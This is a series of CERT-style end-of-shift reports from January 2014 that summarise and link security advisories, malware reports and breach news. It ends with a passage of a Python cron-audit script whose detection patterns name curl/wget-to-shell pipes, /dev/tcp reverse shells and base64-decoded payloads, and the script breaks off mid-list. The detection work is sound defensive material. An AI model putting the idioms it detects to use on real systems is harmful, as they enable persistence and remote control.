http://www.securelist.com/en/blog/8174/A_cross_platform_java_bot
*** DDoS attacks become smarter, faster and more severe ***
---------------------------------------------
DDoS attacks will continue to be a serious issue in 2014 - as attackers become more agile and their tools become more sophisticated, according to Radware. Their report was compiled using data from over 300 cases and the Executive Survey consisting of personal interviews with 15 high-ranking security executives.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16268
*** Worldwide Infrastructure Security Report ***
---------------------------------------------
Arbor's annual Worldwide Infrastructure Security Report offers unique insight from network operators on the front lines in the global battle against network threats.
---------------------------------------------
http://www.arbornetworks.com/resources/infrastructure-security-report
*** SI6 Networks IPv6 Toolkit ***
---------------------------------------------
A security assessment and troubleshooting tool for the IPv6 protocols
---------------------------------------------
http://www.si6networks.com/tools/ipv6toolkit/
*** Security Bulletin: Multiple vulnerabilities in IBM QRadar SIEM (CVE-2014-0838, CVE-2014-0835, CVE-2014-0836, CVE-2014-0837) ***
---------------------------------------------
Multiple vulnerabilities exist in the AutoUpdate settings page and the AutoUpdate process within the IBM QRadar SIEM that when used together could result in remote code execution.
---------------------------------------------
https://www-304.ibm.com/support/docview.wss?uid=swg21663066
*** VU#686662: Fail2ban postfix and cyrus-imap filters contain denial-of-service vulnerabilities ***
---------------------------------------------
Fail2ban versions prior to 0.8.11 are susceptible to a denial-of-service attack when a maliciously crafted email address is parsed by the postfix or cyrus-imap filters. If users have not deployed either of these filters then they are not affected.
---------------------------------------------
http://www.kb.cert.org/vuls/id/686662
*** VU#863369: Mozilla Thunderbird does not adequately restrict HTML elements in email message content ***
---------------------------------------------
Mozilla Thunderbird does not adequately restrict HTML elements in email content, which could allow an attacker to execute arbitrary script when a specially-crafted email message is forwarded or replied to.
---------------------------------------------
http://www.kb.cert.org/vuls/id/863369
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 24-01-2014 18:00 − Monday 27-01-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** ModSecurity Advanced Topic of the Week: HMAC Token Protection ***
---------------------------------------------
This blog post presents a powerful feature of ModSecurity v2.7 that has been highly under-utilized by most users: HMAC Token Protection. There was a previous blog post written that outlined some usage examples here, however we did not properly demonstrate the protection coverage gained by its usage. Specifically, by using the HMAC Token Protection capabilities of ModSecurity, you can reduce the attack surface of the following attacks/vulnerabilities: Forceful Browsing of Website Content
---------------------------------------------
http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/4JiUhR_1fSQ/modsecurit…
*** Mitigation of NTP amplification attacks involving Junos ***
---------------------------------------------
When an NTP client or server is enabled within the [edit system ntp] hierarchy level of the Junos configuration, REQ_MON_GETLIST and REQ_MON_GETLIST_1 control messages supported by the monlist feature within NTP may allow remote attackers to cause a denial of service. NTP is not enabled in Junos by default. Once NTP is enabled, an attacker can exploit these control messages in two different ways:...
---------------------------------------------
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613
*** Security hole in Pages: update advised ***
---------------------------------------------
Users of the Mac and iOS versions of Pages should install the latest version - a security hole in older versions may under some circumstances allow the execution of malicious code.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsluecke-in-Pages-Update-ange…
*** First Android bootkit has infected 350,000 devices ***
---------------------------------------------
January 24, 2014 Russian anti-virus company Doctor Web is warning users about a dangerous Trojan for Android that resides in the memory of infected devices and launches itself early on in the OS loading stage, acting as a bootkit. This allows the Trojan to minimize the possibility that it will be deleted, without tampering with the device's file system. Currently, this malignant program is operating on more than 350,000 mobile devices belonging to users in various countries,...
---------------------------------------------
http://news.drweb.com/show/?i=4206&lng=en&c=9
*** Security Advisory-DoS Vulnerability in Eudemon8000E ***
---------------------------------------------
Huawei Eudemon8000E firewall allows users to log in to the device using Telnet or SSH. When an attacker sends the device a mass of TCP packets with a special structure, the login process becomes slow and users may be unable to log in to the device (HWNSIRT-2014-0101).
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Security Bulletin: GSKit certificate chain vulnerability in IBM Security Directory Server and Tivoli Directory Server (CVE-2013-6747) ***
---------------------------------------------
A vulnerability has been identified in the GSKit component utilized by IBM Security Directory Server (ISDS) and IBM Tivoli Directory Server (TDS). A malformed certificate chain can cause the ISDS or TDS client application or server process using GSKit to hang or crash.
---------------------------------------------
https://www-304.ibm.com/support/docview.wss?uid=swg21662902
*** Security Bulletin: IBM Security SiteProtector System can be affected by a vulnerability in the IBM Java JRE (CVE-2013-5809) ***
---------------------------------------------
IBM Security SiteProtector System can be affected by a vulnerability in the IBM Java JRE. This vulnerability could allow a remote attacker to affect confidentiality, integrity, and availability by means of unknown vectors related to the Java 2D component.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21662685
*** Security Bulletin eDiscovery Manager (CVE-2013-5791 and CVE-2013-5763) ***
---------------------------------------------
CVE-2013-5791 - CVSS Score: 10 - An unspecified vulnerability in Oracle Outside In Technology related to the Outside In Filters component could allow a local attacker to cause a denial of service.
CVE-2013-5763 - CVSS Score: 6.8 - Oracle Outside In technology is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the OS/2 Metafile parser. By causing a vulnerable application to process a malicious file, a remote attacker...
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21659481
*** Vulnerability Note VU#168751 - Emerson Network Power Avocent MergePoint Unity 2016 KVM switches contain a directory traversal vulnerability ***
---------------------------------------------
Emerson Network Power Avocent MergePoint Unity 2016 (MPU2016) KVM switches running firmware version 1.9.16473 and possibly previous versions contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as /etc/passwd to obtain the credentials for the device.
---------------------------------------------
http://www.kb.cert.org/vuls/id/168751
*** Vulnerability Note VU#105686 - Thecus NAS Server N8800 contains multiple vulnerabilities ***
---------------------------------------------
CVE-2013-5667 - Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection
CVE-2013-5668 - Thecus NAS Server N8800 Firmware 5.03.01
CVE-2013-5669 - Thecus NAS Server N8800 Firmware 5.03.01 plain text administrative password
---------------------------------------------
http://www.kb.cert.org/vuls/id/105686
*** Cisco Video Surveillance Operations Manager MySQL Database Insufficient Authentication Controls ***
---------------------------------------------
A vulnerability in the configuration of the MySQL database as installed by Cisco Video Surveillance Operations Manager (VSOM) could allow an unauthenticated, remote attacker to access the MySQL database.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Security update available for Adobe Digital Editions ***
---------------------------------------------
Adobe has released a security update for Adobe Digital Editions for Windows and Macintosh. This update addresses a vulnerability in the software that could cause the application to crash and potentially allow an attacker to take control of the affected system.
---------------------------------------------
http://helpx.adobe.com/security/products/Digital-Editions/apsb14-03.html
*** Hitachi Cosminexus Products Multiple Java Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56545
*** Drupal Doubleclick for Publishers Module Slot Names Script Insertion Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56521
*** WordPress SS Downloads Plugin Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56532
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 23-01-2014 18:00 − Friday 24-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Russian spies unmasked in the Tor network ***
---------------------------------------------
Researchers came across 20 exit nodes that attempted to break open the HTTPS connections of Tor users. Most of them originate from Russia.
---------------------------------------------
http://www.heise.de/security/meldung/Russische-Spione-im-Tor-Netz-enttarnt-…
*** Bug Exposes IP Cameras, Baby Monitors ***
---------------------------------------------
A bug in the software that powers a broad array of webcams, IP surveillance cameras and baby monitors made by Chinese camera giant Foscam allows anyone with access to the device's Internet address to view live and recorded video footage, KrebsOnSecurity has learned.
---------------------------------------------
http://krebsonsecurity.com/2014/01/bug-exposes-ip-cameras-baby-monitors/
*** "Syrian Electronic Army" attacked CNN's Twitter account ***
---------------------------------------------
Broadcaster: "Yes, it has happened to us too. CNN accounts hacked"
---------------------------------------------
http://derstandard.at/1389858074081
*** 65,000 e-mail accounts at Salzburg AG hacked ***
---------------------------------------------
At Salzburg AG the access credentials of more than 65,000 e-mail and Internet accounts have been hacked. Bank data is not affected, the company stressed. The background of the act is unclear. Users and customers are voicing criticism.
---------------------------------------------
http://news.orf.at/stories/2215391/
*** Alleged security hole cannot be found in current Chrome ***
---------------------------------------------
A bug in Google's browser cannot be reproduced with the current version. Google claims to have closed the hole some time ago.
---------------------------------------------
http://www.heise.de/security/meldung/Angebliche-Sicherheitsluecke-in-aktuel…
*** Malicious links for iOS users ***
---------------------------------------------
January 23, 2014 Russian anti-virus company Doctor Web is warning iOS device users about a growing number of incidents involving the distribution of links to bogus sites via mobile app advertisements. An iOS user misguided by such fraud can end up subscribed to a pseudo-service and thus lose money from their mobile account. Recently, users of mobile devices running iOS have been encountering advertisements with increasing frequency in the free applications on their smart phones and tablets. Ads
---------------------------------------------
http://news.drweb.com/show/?i=4204&lng=en&c=9
*** GE Proficy Multiple Vulnerabilities ***
---------------------------------------------
Researchers amisto0x07 and Z0mb1E of Zero Day Initiative (ZDI) have identified two vulnerabilities in the General Electric (GE) Proficy human-machine interface/supervisory control and data acquisition (HMI/SCADA) - CIMPLICITY application. GE has released security advisories, GEIP13-05 and GEIP13-06, to inform customers about these vulnerabilities. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01
*** DSA-2848 mysql-5.5 ***
---------------------------------------------
Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details.
---------------------------------------------
http://www.debian.org/security/2014/dsa-2848
*** Bugtraq: [CVE-2014-1607.] Cross Site Scripting(XSS) in Drupal Event calendar module ***
---------------------------------------------
Reflected cross-site scripting (XSS) vulnerability in the Drupal 7.14 EventCalendar module, found in eventcalendar/year, allows remote attackers to inject arbitrary web script or HTML via the improperly sanitized Year parameter.
---------------------------------------------
http://www.securityfocus.com/archive/1/530876
*** Cisco TelePresence Video Communication Server Expressway Default SSL Certificate Vulnerability ***
---------------------------------------------
A vulnerability in the Cisco TelePresence Video Communication Server (VCS) Expressway could allow an unauthenticated, remote attacker to execute a man-in-the-middle (MITM) attack between one or more affected devices.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 22-01-2014 18:00 − Thursday 23-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** SA-CONTRIB-2014-005 - Leaflet - Access bypass ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-005
Project: Leaflet (third-party module)
Version: 7.x
Date: 2014-January-22
Security risk: Critical
Exploitable from: Remote
Vulnerability: Access bypass
Description
The Leaflet module enables you to display an interactive map using the Leaflet library, using entities as map features. The module exposes complete data from entities used as map features to any site visitor with a JavaScript inspector (like Firebug).
---------------------------------------------
https://drupal.org/node/2179103
*** New Android Malware Steals SMS Messages, Intercepts Calls ***
---------------------------------------------
A new strain of Android malware has emerged that masquerades as an Android security app but once installed, can steal text messages and intercept phone calls.
---------------------------------------------
http://threatpost.com/new-android-malware-steals-sms-messages-intercepts-ca…
*** Official PERL Blogs hacked, 2,924 Author Credentials Leaked by ICR ***
---------------------------------------------
The breach has seen 2,924 user account credentials published to quickleak.org, as well as a deface page being added to the blog, which was not obtrusive to the actual website.
---------------------------------------------
http://www.cyberwarnews.info/2014/01/22/official-perl-blogs-hacked-2924-aut…
*** CrowdStrike Takes On Chinese, Russian Attack Groups in Threat Report ***
---------------------------------------------
Russian attackers targeted energy sector targets and a Chinese nexus intrusion group infected foreign embassies with malware using watering hole tactics in 2013, CrowdStrike researchers found in their first-ever Global Threat Report.
---------------------------------------------
http://www.securityweek.com/crowdstrike-takes-chinese-russian-attack-groups…
*** Outdated energy, water and transport Industrial Control Systems without sufficient cyber security controls require coordinated testing of capability at EU levels, says the EU's cyber security Agency ENISA ***
---------------------------------------------
Today, the EU's cyber security Agency ENISA published a new report giving advice on the next steps towards coordinated testing of the capability of the often outdated Industrial Control Systems (ICS) used by European industries. Among the key recommendations: the testing of ICS is a concern for all EU Member States and could be dealt with at EU level, according to ENISA.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/ics-without-sufficient-cybe…
*** Analysis: Spam in December 2013 ***
---------------------------------------------
In December, spammers continued to honor the traditions of the season and tried to attract potential customers with a variety of original gift and winter vacation offers, taking advantage of the approaching holidays.
---------------------------------------------
http://www.securelist.com/en/analysis/204792323/Spam_in_December_2013
*** Chrome Eavesdropping Exploit Published ***
---------------------------------------------
Exploit code has been published for a Google Chrome bug that allows malicious websites granted permission to use a computer's microphone for speech recognition to continue listening after a user leaves the website.
---------------------------------------------
http://threatpost.com/chrome-eavesdropping-exploit-published/103798
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 21-01-2014 18:00 − Wednesday 22-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** [2014-01-22] Backdoor account & command injection vulnerabilities in Allnet IP-Cam ALL2281 ***
---------------------------------------------
The IP camera Allnet ALL2281 is affected by critical vulnerabilities that allow an attacker to gain access to the web interface via a backdoor account. Furthermore, executing arbitrary OS commands is possible.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Feodo Tracker fights invoice spam ***
---------------------------------------------
The Feodo botnet is currently flooding Germany with virus spam, supposedly in the name of well-known mobile providers and banks. The Feodo Tracker collects indicators in order to slow down the spam network.
---------------------------------------------
http://www.heise.de/security/meldung/Feodo-Tracker-kaempft-gegen-Rechnungs-…
*** Security Bulletins: Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.2 Service Pack 1.
The following vulnerabilities have been addressed: CVE-2013-4494, CVE-2013-4554, CVE-2013-6885
---------------------------------------------
http://support.citrix.com/article/CTX140038
*** Security Bulletins: Citrix XenClient XT Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenClient XT. These vulnerabilities affect all currently supported versions of Citrix XenClient XT up to and including version 3.2.
The following vulnerabilities have been addressed: CVE-2013-4355, CVE-2013-4370, CVE-2013-4416, CVE-2013-4494, CVE-2013-4554
---------------------------------------------
http://support.citrix.com/article/CTX139624
*** SSL Labs: Stricter security requirements for 2014 ***
---------------------------------------------
Today, we're releasing a new version of SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up.
---------------------------------------------
http://blog.ivanristic.com/2014/01/ssl-labs-stricter-security-requirements-…
*** [2014-01-22] Critical vulnerabilities in T-Mobile HOME NET Router LTE (Huawei B593u-12) ***
---------------------------------------------
Attackers are able to completely compromise the T-Mobile Austria HOME NET router (based on Huawei B593u-12) without prior authentication. Depending on the configuration of the router it is also possible to exploit the flaws directly from the Internet.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Digitally signed data-stealing malware targets Mac users in "undelivered courier item" attack ***
---------------------------------------------
Our colleagues at SophosLabs pointed us at an interesting item of malware the other day, namely a data-stealing Trojan aimed at Mac users. In fact, it was somewhat more than that: it was one of those "undelivered courier item" emails linking to a dodgy web server that guessed whether you were running Windows or OS X, and targeted you accordingly.
---------------------------------------------
http://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-ma…
*** Cisco TelePresence System Software Command Execution Vulnerability ***
---------------------------------------------
Cisco TelePresence System Software contains a vulnerability in the System Status Collection Daemon (SSCD) code that could allow an unauthenticated, adjacent attacker to execute arbitrary commands with the privileges of the root user.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco TelePresence Video Communication Server SIP Denial of Service Vulnerability ***
---------------------------------------------
Cisco TelePresence Video Communication Server (VCS) contains a vulnerability that could allow an unauthenticated, remote attacker to trigger the failure of several critical processes, which may cause active calls to be dropped and prevent users from making new calls until the affected system is reloaded.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco TelePresence ISDN Gateway D-Channel Denial of Service Vulnerability ***
---------------------------------------------
Cisco TelePresence ISDN Gateway contains a vulnerability that could allow an unauthenticated, remote attacker to trigger the drop of the data channel (D-channel), causing all calls to be terminated and preventing users from making new calls.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 20-01-2014 18:00 − Tuesday 21-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Security test set up: BSI reports identity theft on a scale of millions ***
---------------------------------------------
While analysing botnets, authorities discovered around 16 million affected user accounts. The BSI is offering a security test to check e-mail addresses for identity theft. (Internet, Security)
---------------------------------------------
http://www.golem.de/news/sicherheitstest-eingerichtet-bsi-meldet-millionenf…
*** Android Vulnerability Enables VPN Bypass ***
---------------------------------------------
A hole in Android's VPN feature could expose what should be securely communicated data as clear, unencrypted text.
---------------------------------------------
http://threatpost.com/android-vulnerability-enables-vpn-bypass/103719
*** Details on Patched Microsoft Office 365 XSS Vulnerability Disclosed ***
---------------------------------------------
A cross-site scripting vulnerability in Microsoft Office 365 casts attention on the need to shore up the security of cloud-based enterprise applications.
---------------------------------------------
http://threatpost.com/details-on-patched-microsoft-office-365-xss-vulnerabi…
*** Battle over the backdoors of a networked world ***
---------------------------------------------
Adam Philpott of network giant Cisco denies cooperation with intelligence services and outlines new threats in the network of the future
---------------------------------------------
http://derstandard.at/1389857261752
*** Blog: WhatsApp for PC - a guaranteed Trojan banker ***
---------------------------------------------
WhatsApp for PC - now from Brazil and bringing banker which will steal your money. It hides itself as an mp3 file and has a low VT detection.
---------------------------------------------
http://www.securelist.com/en/blog/208214225/WhatsApp_for_PC_a_guaranteed_Tr…
*** EU cyber security Agency ENISA calls for secure e-banking and e-payments: non-replicable, single-use credentials for e-identities are needed in the financial sector ***
---------------------------------------------
Different tokens, devices, mobile phones, e-signatures, etc. are used to authenticate our e-identities. Yet, some financial institutions are still not considering the risk of inadequate authentication mechanisms according to a new study by the EU Agency ENISA.
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/enisa-calls-for-secure-e-ba…
*** Spoiled Onions ***
---------------------------------------------
As of January 2014, the Tor anonymity network consists of 5,000 relays of which almost 1,000 are exit relays. As the diagram to the right illustrates, exit relays bridge the gap between the Tor network and the open Internet. As a result, exit relays are able to see anonymised network traffic as it is sent by Tor clients. While most exit relays are innocuous and run by well-meaning volunteers, there are exceptions: In the past, some exit relays were documented to have sniffed and
---------------------------------------------
http://www.cs.kau.se/philwint/spoiled_onions/
*** Merkur customer data cracked with Nocard ***
---------------------------------------------
Students at FH Salzburg managed to gain access to customer profiles using the customer card generator
---------------------------------------------
http://derstandard.at/1389857747260
*** WordPress WordFence Plugin "User-Agent" Script Insertion Vulnerability ***
---------------------------------------------
Input passed via the "User-Agent" HTTP header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator's browser session in the context of an affected site when the malicious data is being viewed.
---------------------------------------------
https://secunia.com/advisories/56558
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 17-01-2014 18:00 − Monday 20-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** NCR: 95 percent of all ATMs worldwide run Windows XP ***
---------------------------------------------
According to a senior manager at the manufacturer NCR, almost all ATMs worldwide still run Windows XP. The German banking industry association (Deutsche Kreditwirtschaft) will have none of it and states that ATMs in Germany are not connected to the Internet. The type of operating system therefore supposedly plays no role.
---------------------------------------------
http://www.golem.de/news/ncr-weltweit-95-prozent-aller-geldautomaten-mit-wi…
*** Adware vendors buy Chrome Extensions to send ad- and malware-filled updates ***
---------------------------------------------
A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the "Add to Feedly" extension. One morning, Agarwal got an e-mail offering "4 figures" for the sale of his Chrome extension. The extension was only about an hour's worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account.
---------------------------------------------
http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensio…
*** VPN Related Vulnerability Discovered on an Android device - Disclosure Report ***
---------------------------------------------
As part of our ongoing mobile security research we have uncovered a network vulnerability on Android devices which has serious implications for users using VPN. This vulnerability enables malicious apps to bypass active VPN configuration (no ROOT permissions required) and redirect secure data communications to a different network address. These communications are captured in CLEAR TEXT (no encryption), leaving the information completely exposed. This redirection can take place while leaving the
---------------------------------------------
http://cyber.bgu.ac.il/blog/vpn-related-vulnerability-discovered-android-de…
*** Looking Forward Into 2014: What 2013′s Mobile Threats Mean Moving Forward ***
---------------------------------------------
2013 was the year that Android malware not just grew, but matured into a full-fledged threat landscape. Not only did the number of threats grow, the sophistication and capabilities associated with these threats grew as well. As we noted earlier, the number of mobile malware threats has crossed the one million mark, and as of ...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/mF1EIjR8duU/
*** Open-Xchange Server Multiple Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in Open-Xchange, which can be exploited by malicious users to disclose potentially sensitive information and by malicious people to conduct cross-site scripting and script insertion attacks.
---------------------------------------------
https://secunia.com/advisories/56390
*** F5 ARX Series Cyrus SASL NULL Pointer Dereference Vulnerability ***
---------------------------------------------
F5 has acknowledged a vulnerability in F5 ARX Series, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a bundled vulnerable version of Cyrus SASL in relation to the ARX Manager Configuration utility.
---------------------------------------------
http://secunia.com/advisories/56077/
*** Moodle Security Bypass Security Issue and Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
A security issue and a vulnerability have been reported in Moodle, which can be exploited by malicious users to bypass certain security restrictions and by malicious people to conduct cross-site request forgery attacks.
---------------------------------------------
https://secunia.com/advisories/56556
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 16-01-2014 18:00 − Friday 17-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** JS-Binding-Over-HTTP Vulnerability and JavaScript Sidedoor: Security Risks Affecting Billions of Android App Downloads ***
---------------------------------------------
Third-party libraries, especially ad libraries, are widely used in Android apps. Unfortunately, many of them have security and privacy issues. In this blog, we summarize our findings related to the insecure usage of JavaScript binding in ad libraries.
---------------------------------------------
http://www.fireeye.com/blog/technical/2014/01/js-binding-over-http-vulnerab…
*** ECAVA INTEGRAXOR BUFFER OVERFLOW VULNERABILITY ***
---------------------------------------------
Overview: This advisory is a follow-up to the alert titled ICS-ALERT-14-015-01 Ecava IntegraXor Buffer Overflow Vulnerability that was published January 15, 2014, on the NCCIC/ICS-CERT Web site.
Independent researcher Luigi Auriemma identified a buffer overflow vulnerability in the Ecava IntegraXor application without coordination with NCCIC/ICS-CERT, the vendor, or any other coordinating entity known to NCCIC/ICS-CERT. Ecava has produced a patch version that mitigates this vulnerability.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-016-01
*** A Closer Look at the Target Malware, Part II ***
---------------------------------------------
Yesterday's story about the point-of-sale malware used in the Target attack has prompted a flood of reporting from antivirus and security vendors. Buried within those reports are some interesting details that speak to possible actors involved and to the timing and discovery of this breach.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/V1LusjgMQk8/
*** HPSBUX02961 SSRT101420 rev.1 - HP-UX Running BIND, Remote Denial of Service (DoS) ***
---------------------------------------------
A potential security vulnerability has been identified with HP-UX running BIND. This vulnerability could be exploited remotely to create a Denial of Service (DoS).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Thingbot: botnet infects refrigerator ***
---------------------------------------------
A US security company has uncovered a botnet. What is special about it is that around a quarter of the infected devices are not computers but other Internet-capable devices, among them a refrigerator. (Spam, Malware)
---------------------------------------------
http://www.golem.de/news/thingbot-botnetz-infiziert-kuehlschrank-1401-10397…
*** Microsoft deletes Tor software after Trojan infection ***
---------------------------------------------
Microsoft has deleted outdated Tor software, which a Trojan had installed, from several hundred thousand Windows PCs. The covertly set-up service is said to still be active on up to two million machines.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-loescht-Tor-Software-nach-Tr…
*** Oldboot: the first bootkit on Android ***
---------------------------------------------
A few days ago, we found an Android Trojan using a brand new method to modify the device's boot partition and boot script file to launch a system service and extract a malicious application during the early stage of system booting. Due to the special RAM disk feature of the Android device's boot partition, no current mobile antivirus product in the world can completely remove this Trojan or effectively repair the system. We named this Android Trojan family Oldboot. As far as we
---------------------------------------------
http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-andro…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 15-01-2014 18:00 − Thursday 16-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Compromised Sites Pull Fake Flash Player From SkyDrive ***
---------------------------------------------
On most days, our WorldMap shows more of the same thing. Today is an exception. One infection is topping so high in the charts that it pretty much captured our attention. Checking the recent history of this threat, we saw that these past few days, it has been increasing in infection hits. So we dug deeper. It wasn't long before we saw that a lot of scripts hosted in various websites got compromised. Our telemetry actually showed that almost 40% of the infected websites were hosted in Germany. In
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002659.html
*** Microsoft antimalware support for Windows XP ***
---------------------------------------------
Microsoft has announced the Windows XP end of support date of April 8, 2014. After this date, Windows XP will no longer be a supported operating system. To help organizations complete their migrations, Microsoft will continue to provide updates to our antimalware signatures and engine for Windows XP users through July 14, 2015. This does not affect the end-of-support date of Windows XP, or the supportability of Windows XP for other Microsoft products, which deliver and apply those signatures.
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/01/15/microsoft-antimalware-su…
*** SA-CORE-2014-001 - Drupal core - Multiple vulnerabilities ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CORE-2014-001
Project: Drupal core
Version: 6.x, 7.x
Date: 2014-January-15
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities
Description
Multiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7.
Impersonation (OpenID module - Drupal 6 and 7 - Highly critical)
A vulnerability was found in the OpenID module that allows a malicious user to log in as other users on the site, including administrators, and hijack
---------------------------------------------
https://drupal.org/SA-CORE-2014-001
*** A First Look at the Target Intrusion, Malware ***
---------------------------------------------
Last weekend, Target finally disclosed at least one cause of the massive data breach that exposed personal and financial information on more than 110 million customers: Malicious software that infected point-of-sale systems at Target checkout counters. Today's post includes new information about the malware apparently used in the attack, according to two sources with knowledge of the matter.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/OVODHvnhoQs/
*** Amazon's public cloud fingered as US's biggest MALWARE LAIR ***
---------------------------------------------
Cyber-crooks lurve Bezos & Co's servers and their whitelisted IP addresses. Amazon's public cloud is the largest haven of malware spreaders in the US, according to security company Solutionary.…
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/16/amazon_clou…
*** Ecava IntegraXor Buffer Overflow Vulnerability ***
---------------------------------------------
NCCIC/ICS-CERT is aware of a public report of a buffer overflow vulnerability with proof-of-concept (PoC) exploit code affecting Ecava IntegraXor, a supervisory control and data acquisition/human-machine interface (SCADA/HMI) product. According to this report, the vulnerability is exploitable by using a command to load an arbitrary resource from an arbitrary DLL located in the program’s main folder.
---------------------------------------------
http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-015-01
*** Advisory (ICSA-13-344-01) WellinTech Multiple Vulnerabilities ***
---------------------------------------------
NCCIC/ICS-CERT received reports from the Zero Day Initiative (ZDI) regarding a remote code execution vulnerability and an information disclosure vulnerability in WellinTech KingSCADA, KingAlarm&Event, and KingGraphic applications. These vulnerabilities were reported to ZDI by security researcher Andrea Micalizzi. WellinTech has produced a new version that mitigates these vulnerabilities. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01
*** Google strengthens anti-spam team with acquisition ***
---------------------------------------------
The team of the start-up Impermium, which develops a system against e-mail account abuse, is moving to the Internet giant.
---------------------------------------------
http://www.heise.de/security/meldung/Google-verstaerkt-Anti-Spam-Team-mit-Z…
*** Telekom responds to forged invoices with a blog post ***
---------------------------------------------
Once again criminals are sending forged Telekom online invoices as bait to distribute malware. This time the company is responding with warning e-mails and a blog post explaining how to tell them apart from genuine invoices.
---------------------------------------------
http://www.heise.de/security/meldung/Telekom-reagiert-mit-Blog-Eintrag-auf-…
*** The Hidden Backdoors to the City of Cron ***
---------------------------------------------
An attacker's key to a profitable malware campaign is persistence. Malicious code that is easily detected and removed will not generate enough value for its creators. This is why we are seeing more and more malware using creative backdoor techniques, different obfuscation methods and unique approaches to increase its lifespan.
---------------------------------------------
http://feedproxy.google.com/~r/sucuri/blog/~3/MCeUaRyYi88/the-hidden-backdo…
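The persistence described above is commonly planted as a cron entry that re-creates a removed backdoor. What follows is an added example, not code from the Sucuri post: it parses crontab text, flags entries that match common backdoor indicators, and can be pointed at a host's real cron files. The indicator list, thresholds and the sample crontab are constructed for illustration and will need tuning to what is normal on your own hosts.

```python
"""Audit cron entries for persistence indicators (added example, not Sucuri's code)."""
import glob
import re

# Indicator patterns are illustrative; tune them to what is normal on your hosts.
INDICATORS = [
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b", "download piped straight into a shell"),
    (r"/dev/tcp/", "bash /dev/tcp reverse-shell idiom"),
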